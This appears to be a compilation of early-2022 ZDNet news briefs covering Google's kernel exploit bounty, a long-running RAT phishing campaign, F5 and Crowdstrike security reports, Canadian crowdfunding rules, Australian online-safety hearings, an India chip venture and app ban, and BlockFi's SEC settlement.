Information Technology

Image: isak55/Shutterstock
Google will pay between $20,000 and $91,337 to researchers who create exploits of vulnerabilities in the Linux kernel, the Kubernetes container management system, and Google Cloud’s Kubernetes Engine.This builds on the three-month bounty Google introduced in November, where it tripled rewards for exploits against new and previously unknown Linux kernel bugs. The idea was that the crowd would uncover new kernel exploitation techniques, for services running on Kubernetes in the cloud in particular. 

Researchers needed to show they could use the exploit for a given bug to compromise Google’s kCTF (Kubernetes Capture The Flag) cluster and obtain a ‘flag’ — a secret hidden in a program — within the context of a competition, which in this case was held on Google’s cluster.SEE: Cybersecurity: Let’s get tactical (ZDNet special report)Google considered the expanded program a success, and so it will extend it to at least the end of 2022. But it has also made a number of changes, covering rules, conditions and rewards.First, the updated and extended program increases the maximum reward for a single exploit from $50,337 to $91,377. On the success side of the existing trial, Google said it received nine submissions in the three months and paid out over $175,000 in rewards. The submissions included five zero-days or previously unknown flaws and two exploits for ‘1days’ or just discovered flaws. Three have been fixed and made public, including CVE-2021-4154, CVE-2021-22600 (patch) and CVE-2022-0185 (writeup), according to Google.  

Google is changing the reward structure “slightly”. It will now pay $31,337 “to the first valid exploit submission for a given vulnerability” and will pay nothing for duplicate exploits. However, it says some bonuses may still apply to duplicate exploits. These include: $20,000 for exploits for 0day vulnerabilities; $20,000 for exploits for vulnerabilities that do not require unprivileged user namespaces (CLONE_NEWUSER); and $20,000 for exploits using novel exploit techniques (previously it paid nothing for these). “These changes increase some 1day exploits to 71,337 USD (up from 31,337 USD), and makes it so that the maximum reward for a single exploit is 91,337 USD (up from 50,337 USD),” Google notes. On what it considers novel techniques, Google explains it’s for “powerful” offerings: “[N]ovel technique could be the exploitation of previously unknown objects to transform a limited primitive into a more powerful one, such as an arbitrary/out-of-bounds read/write or arbitrary free. For example, in all our submissions, researchers leveraged message queues to achieve kernel information leaks. “We are looking for similarly powerful techniques that allow heap exploits to be ‘plugged in’ and immediately allow kernel access. Another example is bypassing a common security mitigation or a technique for exploiting a class of vulnerabilities more reliably.”This Linux kernel exploitation bug bounty is a small part of Google’s overall Vulnerability Reward Programs covering Android, Chrome and other open-source projects. In 2021, Google paid out $8.7 million in rewards, $2.9 million of which was for Android bugs and $3.3 million for Chrome bugs. Last year’s total rewards rose from $6.7 million in 2020.  More

An unknown criminal hacking group is targeting organisations in the aviation, aerospace, defence, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years.Dubbed TA2541 and detailed by cybersecurity researchers at Proofpoint, the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organisations across North America, Europe, and the Middle East.

ZDNet Recommends

Despite running for years, the attacks have barely evolved, broadly following the same targeting and themes in which attackers remotely control compromised machines, conduct reconnaissance on networks and steal sensitive data. SEE: A winning strategy for cybersecurity (ZDNet special report)”What’s noteworthy about TA2541 is how little they’ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,” said Sherrod DeGrippo, vice president of threat research and Detection at Proofpoint. “This group is a persistent threat to targets throughout the transportation, logistics, and travel industries.”Attacks begin with phishing emails designed to be relevant to individuals and businesses in the sectors being targeted. For example, one lure sent to targets in aviation and aerospace resembles requests for aircraft parts, while another is designed to look like an urgent request for air ambulance flight details. At one point, the attackers introduced COVID-19-themed lures, although these were soon dropped.

While the lures aren’t highly customised and follow regular templates, the sheer number of messages sent over the years – hundreds of thousands in total – and their implied urgency will be enough to fool victims into downloading malware. The messages are nearly always in English.  TA2541 initially sent emails containing macro-laden Microsoft Word attachments that downloaded the Remote Access Trojan (RAT) payload, but the group has recently shifted to using Google Drive and Microsoft OneDrive URLs, which lead to an obfuscated Visual Basic Script (VBS) file.  Interacting with these files – the names of which follow similar themes to the initial lures – will leverage PowerShell functions to download malware onto compromised Windows machines. The cyber criminals have distributed over a dozen different trojan malware payloads since the campaigns began, all of which are available to buy on dark web forums or can be downloaded from open-source repositories.  Currently, the most commonly delivered malware in TA2541 campaigns is AsyncRAT, but other popular payloads include NetWire, WSH RAT and Parallax. No matter which malware is delivered, it’s used to gain remote control of infected machines and steal data, although researchers note that they still don’t know what the ultimate goal of the group is, or where they are operating from. The campaign is still active and it’s been warned that the attackers will continue to distribute phishing emails and deliver malware to victims around the world.  MORE ON CYBERSECURITY More

F5 has launched a new software-as-a-service (SaaS) platform aimed at simplifying the firm’s branching security solutions.

Over the past few years, F5 has expanded its services with software and cloud services designed to tackle the disparity between the enterprise push toward digital transformation and an existing reliance on legacy systems. According to an F5 survey, 88% of organizations say they operate both legacy and modern architectures today.  When these systems, as well as Internet of Things (IoT), edge devices, cloud, remote collaborative tools, and mobile all, have to be considered by IT teams when considering potential attack vectors, managing such complexity and risk can be a challenge.  On Tuesday, the application security company said the portfolio expansion, called F5 Distributed Cloud Services, will “provide security, multi-cloud networking, and edge-based computing solutions.” Also: Deloitte launches new SaaS cyber threat detection and response platformF5 Distributed Cloud is a merger of technologies obtained by F5 from Volterra and Shape security. Functionality includes multi-cloud networking (MCN) functionality, cloud load balancing, cloud-native computing capabilities for edge computing use cases, and a Kubernetes Gateway.

The service will also include a new offering launched today, called the F5 Distributed Cloud WAAP (Web Application and API Protection).  WAAP integrates F5’s web application firewall and protection (F5 Advanced WAF), bot mitigation (F5 Shape AI), distributed denial-of-service (DDoS) monitoring, and API defenses based on Volterra’s machine learning technologies. The SaaS suite will enable teams to deploy each solution automatically and collectively.  “Today’s applications and business models are adapting faster than ever, and that means app security and infrastructure need to be much more agile and effective,” commented Haiyan Song, GM of the Security & Distributed Cloud Product Group at F5. “We are rapidly integrating our portfolio of services onto a distributed cloud services platform and continually innovating new services, so our customers can have the capabilities they need at the pace they require to achieve their ongoing business transformation.”  See alsoHave a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

The number of hostile nation-state hacking operations is rising as new countries invest in cyber-intrusion campaigns and existing state-backed attack groups take advantage of the rise in organisations adopting cloud applications.Crowdstrike’s 2022 Global Threat Report details how the cyber-threat landscape has evolved during the past year. One of those developments is the rise of new countries engaging in offensive cyber operations, including Turkey and Columbia.

ZDNet Recommends

In accordance with Crowdstrike’s naming conventions, attacks by Turkish-linked groups are detailed as attacks by ‘Wolf’ while attacks by Columbian operations have been Dubbed ‘Ocelot’ – in a similar way to how cybersecurity researchers name Russian government-backed activity ‘Bear’ or Chinese hacking groups ‘Panda’.SEE: Cloud security in 2021: A business guide to essential tools and best practicesActivity by one of these new groups is detailed in the report; a Turkish-based hacking group, dubbed Cosmic Wolf by researchers, targeted data of an unspecified victim stored within an Amazon Web Services (AWS) cloud environment in April 2021.The attackers were able to break into the AWS cloud environment using stolen usernames and passwords, which also provided the attackers with the privileges required to alter command lines. That means they were able to alter security settings to allow direct Secure Shell Protocol (SSH) access to AWS from their own infrastructure, enabling the theft of data.Ultimately, countries are seeing that cyber campaigns can be easier to conduct than traditional espionage and are investing in these techniques.

“There are a lot of countries out there that look at this and realise it’s cheaper, it’s easier and it’s got plausible deniability built into it,” Adam Meyers, senior vice president of Intelligence at Crowdstrike, told ZDNet.”That’s what’s happening – we’re seeing more countries have developed these programmes and they’re going to get better at it over time.”One of the reasons countries are increasing their offensive cyber capabilities is due to the impact of the global pandemic. Lockdowns and stringent travel checks made it harder for traditional espionage techniques to be effective, leading towards investment in cyber operations.”It’s created a little bit more demand or accelerated planning around developing cyber capabilities for some of these countries that would have perhaps relied on other means previously,” said Meyers.The shift towards cloud applications and cloud IT services has also played an unwitting role in making cyberattacks easier. The rise of hybrid working means many employees aren’t based in an office, instead connecting remotely via collaborative applications, VPNs and other services – using a username and password.SEE: A winning strategy for cybersecurity (ZDNet special report)That makes being productive while working remotely simpler for employees – but it’s also made things simpler for hacking groups, who can secretly access networks with a stolen – or guessed – username and password. Some of the biggest cybersecurity incidents of recent years, like the SolarWinds and Microsoft Exchange attacks, have demonstrated how an attack targeting cloud services and cloud supply chains could be powerful, particularly if cloud is misconfigured or poorly monitored. “As organisations are moving to the cloud and looking to develop better capabilities, threat actors are moving there as well,” said Meyers.There are, however, steps that organisations can take to help make their networks and their cloud infrastructure more resistant to cyberattacks, including the adoption of a zero-trust strategy of not trusting devices connecting to the network by default. The research paper also recommends that organisations work towards eliminating misconfigurations in their cloud applications and services by setting up default patterns for setting up cloud, so when new accounts are set up, it’s done in a predictable manner, minimising the possibility of human error going undetected. Cloud architecture should also be monitored and maintained with security updates, like any other software.  MORE ON CYBERSECURITY More

Images: Sopa Images/Getty Images
Canada Deputy Prime Minister and Minister for Finance Chrystia Freeland has announced the government is broadening the scope of the country’s anti-money laundering monitoring and terrorist financing laws to cover crowdfunding platforms and the payment service providers they use. “These changes cover all forms of transactions, including digital assets such as crypto currencies,” she announced during a press conference on Monday night.   “The illegal blockades have highlighted the fact that crowdfunding platforms and some of the payment service providers they use are not fully captured under the proceeds of crime and terrorist financing act. “Our banks and financial institutions are already obligated to report the Financial Transactions and Reports Analysis Centre of Canada or FINTRAC. As of today, all crowdfunding platforms and the payment service providers they use must register with FINTRAC, and they must report large and suspicious transactions to FINTRAC.” The expanded rules are in response to ongoing “Freedom Convoy” protests, started by Canadian truck drivers opposing COVID-19 vaccination and quarantine mandates for cross-border drivers, that have shut down border crossings and halted downtown Ottawa. The protests, which have now entered their third week, have been partly funded by donors to self-described crowdfunding platform GiveSendGo. The platform was hacked on Sunday night, however, resulting in thousands of donor details being stolen. According to nonprofit leak site Distributed Denial of Secrets, it has obtained donor information for the Freedom Convoy campaign from the GiveSendGo platform as of Sunday, including self-reported names, email addresses, and ZIP codes.

Distributed Denial of Secrets said it would only provide the data to researchers and journalists. At the same time, Prime Minister Justin Trudeau invoked rarely used emergency powers under the Emergencies Act in an attempt to quell protests. The Emergencies Act gives government powers for 30 days to ban people from gathering in certain locations, allow officials to tow private vehicles blocking roads, and give power to financial institutions to block funds used to support illegal blockades.”The Emergencies Act will be used to strengthen and support law enforcement agencies at all levels across the country. This is about keeping Canadians safe, protecting people’s jobs and restoring confidence in our institutions,” Trudeau said. “We cannot and will not allow illegal and dangerous activities to continue,” he continued, assuring that the government will not use the Emergencies Act to call in the military. “We’re not suspending fundamental rights or overriding the Charter of Rights freedoms. We are not limiting people’s freedom of speech. We are not limiting freedom of peaceful assembly. We are not preventing people from exercising their right to protest legally,” Trudeau added.  Related Coverage More

Image: Asha Barbaschow/ZDNet
Australia’s eSafety commissioner Julie Inman Grant was questioned by senators on Tuesday morning about the efficacy of the recently enacted Online Safety Act, which expanded the commissioner’s takedown powers to cover more cyberbullying content – including those targeting adults — intimate images of someone that was shared without their consent, abhorrent violent material, and restricted content. The grilling arose in response to a letter written by Western Australia Police Minister Paul Papalia to Federal Communications Minister Paul Fletcher that called for the Online Safety Act powers to be used more expeditiously. Papalia wrote the letter after a TikTok video surfaced online of a stolen vehicle occupied by boys aged 11 and 12, and a girl aged 13, ramming a police car into a tree in Broome, injuring two police officers. The video was posted by the children shortly before they crashed the vehicle.Explaining the aftermath, Inman Grant said her agency was not aware of the TikTok content until Papalia’s letter was published by a media outlet on Sunday evening. After becoming aware of the letter, the eSafety commissioner said her agency contacted the WA Police, Snapchat, and TikTok to ascertain what actions were being taken.Prior to the eSafety commissioner’s office reaching out to WA Police, however, the police agency had made no contact with the commissioner about the incident. The WA Police has also not filed any complaints to the agency as yet either. When asked about the various ways WA Police can work with the eSafety commissioner to exercise the latter’s powers, Inman Grant conceded that a memorandum of understanding (MoU) with WA Police covering the new Online Safety Act capabilities was not yet in place. Inman Grant noted, however, that an MoU is not necessary for law enforcement to report harmful content to her agency.

She also said her agency recently hired new law enforcement liaison staff that would be specifically tasked with updating its MoUs with federal and state law enforcement agencies. “[MoUs] help guide protocol, but if a police agency came to us needing help with removal we wouldn’t require an MOU to do that,” Inman Grant said. Minister for Superannuation, Financial Services and the Digital Economy Jane Hume, who appeared alongside Inman Grant before Senate Estimates, then laid the blame of the Online Safety Act not being exercised for this incident at Papalia’s feet, saying he was “entirely aware that it was a cybercrime well in advance, so he could have made the complaint”. In response to this revelation, Labor Senator Louise Pratt criticised the eSafety commissioner’s job in providing awareness on how to make use of the Online Safety Act’s takedown powers due to the agency’s media campaign so far being focused on updating the eSafety website. “If the creative is ready, surely they should spend it here and now rather than saving the expenditure of that creative. Frankly, when prices escalate because there’s more competition for a media buy during an election campaign,” Pratt said. At the time of writing, the eSafety website’s home page did not have a direct link to the page for reporting harmful content. On online search engines, meanwhile, results of the eSafety website contained a sub-result displaying the reporting page. The eSafety commissioner did not respond directly to Pratt’s critique, saying: “We have been the eSafety regulators since 2015. Not every single citizen or organisation may be aware of us; we do whatever we can in our power to let as many people know and we’ll continue to do that. I’m not sure what more I can say.” “I think this is like any public health campaign. Behavioural change takes a really long time,” she said. Providing an update of the Online Safety Act’s powers since it came into force three weeks ago, Inman Grant said her agency has handled more than 200 complaints from Australian adults experiencing abuse and harassment online. Representing an 85% increase compared to the same period a year ago, these complaints have focused on explicit instructions and encouragement to commit suicide, threats of murder, and the menacing publication of personal details online. RELATED COVERAGE More

Taiwanese electronics manufacturing giant Foxconn and Indian conglomerate Vedanta have signed a memorandum of understanding to form a joint venture that will manufacture semiconductors in India.Under the MoU, Vedanta will hold the majority in the JV, while Foxconn will be a minority shareholder. Vendanta chairman Anil Agarwal will also be the chairman of the new joint venture, the companies said. “This first-of-its-kind joint venture between the two companies will support Indian Prime Minister Narendra Modi’s vision to create an ecosystem for semiconductor manufacturing in India,” the companies added.The location for the new chip plant is still being finalised with a number of state governments in India, according to the companies.At the end of last year, the Indian government announced a plan that will see the nation put ₹2,30,000 crore, around $30 billion, behind a plan to turn India into a semiconductor manufacturing powerhouse. The government added it would be putting ₹55,392 crore, around $7.5 billion, behind its electronics manufacturing schemes, which include large scale electronics manufacturing, IT hardware, promotion activities, and electronics manufacturing clusters.  Establishing a semiconductor facility comes during a time when electronic makers continue to struggle with the global chip shortage, which has been predicted to last up until early 2023.

Also in India, the union government has issued a ban on an additional 54 Chinese apps, including those owned by Tencent and Alibaba. The enforcement was issued by the Ministry of Electronics and IT under section 69a of the Information Technology Act, as reported by Economic Times.”The 54 apps have already been blocked from being accessed in India through the [Google] Play Store,” an official told ET.”Many of the apps from the stable of Tencent and Alibaba, have changed hands to hide ownership. They are also being hosted out of countries like Hong Kong or Singapore, but the data was ultimately going to servers in Chinese destinations.” This latest ban by the Indian government is in addition to the 59 Chinese apps that have been barred from the subcontinent since June 2020. Those affected apps included TikTok, Weibo, and WeChat.MORE FROM INDIA More

Image: snjivo — Shutterstock
The US Securities and Exchange Commission (SEC) has found that crypto lender BlockFi operated for 18 months as an unregistered investment company. The company offered BlockFi Interest Accounts (BIAs) — where users lent crypto assets back to BlockFi for a variable monthly interest payment — which the SEC found were securities, and therefore the BlockFi needed to register with the regulator. Along with the findings, BlockFi has agreed to pay a $50 million penalty to settle with the SEC and another $50 million to settle similar charges in 32 states. The company will also halt offering unregistered products, seek registration of a new lending product, and has 60 days to bring its business into compliance. BlockFi was also found to have made a false and misleading statement for over two years on its site related to the level of risk in loan portfolio and lending activity. “This is the first case of its kind with respect to crypto lending platforms,” SEC chair Gary Gensler said. “Today’s settlement makes clear that crypto markets must comply with time-tested securities laws, such as the Securities Act of 1933 and the Investment Company Act of 1940. It further demonstrates the Commission’s willingness to work with crypto platforms to determine how they can come into compliance with those laws.” The SEC added that the rest of the crypto lending ecosystem should “take immediate notice of today’s resolution” and comply with US securities laws.

BlockFi framed the announcement as being the first company under a “new regulatory framework for crypto sector”. “From the day we started BlockFi, we have always known that strong engagement with regulators would be critical for the adoption of financial services powered by cryptocurrencies. Today’s milestone is yet another example of our pioneering efforts in securing regulatory clarity for the broader industry and our clients, just as we did for our first product — the crypto-backed loan,” CEO and founder Zac Prince said. “We intend for BlockFi Yield to be a new, SEC-registered crypto interest-bearing security, which will allow clients to earn interest on their crypto assets.” The company added that existing customers will keep their accounts, but they cannot add to it, and users will be shifted across to the Yield product unless they tell the company not to. Users outside the US can continue using BIAs as they always have. Related Coverage More